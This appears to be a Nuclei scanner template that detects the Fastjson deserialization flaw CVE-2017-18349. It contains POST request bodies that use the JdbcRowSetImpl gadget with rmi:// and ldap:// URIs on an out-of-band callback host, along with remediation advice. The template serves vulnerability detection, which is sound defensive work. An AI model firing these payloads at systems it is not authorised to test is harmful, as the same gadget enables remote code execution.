id: CVE-2017-18349

info:
  name: Fastjson Insecure Deserialization - Remote Code Execution
  author: night
  severity: critical
  description: |
    parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
  impact: |
    Successful exploitation allows complete system compromise through remote code execution, enabling attackers to execute arbitrary commands, access sensitive data, and establish persistent backdoors on the target system.
  remediation: |
    Update Fastjson to version 1.2.25 or later which includes security patches for this vulnerability.Disable autotype functionality by setting `fastjson.parser.autoTypeSupport=false`.Implement strict whitelist filtering for `@type` annotations, validate and sanitize all JSON input.Use Web Application Firewalls (WAF) to filter malicious requests, and regularly audit dependencies for known vulnerabilities. Consider migrating to safer JSON parsing libraries like Jackson with secure configurations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18349
    - https://github.com/alibaba/fastjson/wiki/security_update_20170315
    - https://github.com/pippo-java/pippo/issues/466
    - https://github.com/h0cksr/Fastjson--CVE-2017-18349-
    - https://fortiguard.com/encyclopedia/ips/44059
    - https://www.exploit-db.com/exploits/45983
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-18349
    cwe-id: CWE-20
    epss-score: 0.8869
    epss-percentile: 0.99526
    cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: alibaba
    product: fastjson
  tags: cve,cve2017,fastjson,deserialization,rce,oob,oast,vkev,vuln

variables:
  rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}"
  ldap_payload: "ldap://{{interactsh-url}}/{{randstr}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{rmi_payload}}",
        "autoCommit": true
      }

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and

    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{ldap_payload}}",
        "autoCommit": true
      }

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and

    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "data": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{rmi_payload}}",
          "autoCommit": true
        }
      }

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and

    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "b": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{ldap_payload}}",
          "autoCommit": true
        }
      }

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and

    extractors:
      - type: kval
        kval:
          - interactsh_ip
# digest: 4a0a00473045022100af94d3ec5494bdc03305ac81e620f59dff631c3472070cac5ea7564b935d689702200a199c1add00bfc504cbc83686da9e784a4d46f60d0b69e1226abc1585995b2c:922c64590222798bb761d5b6d8e72950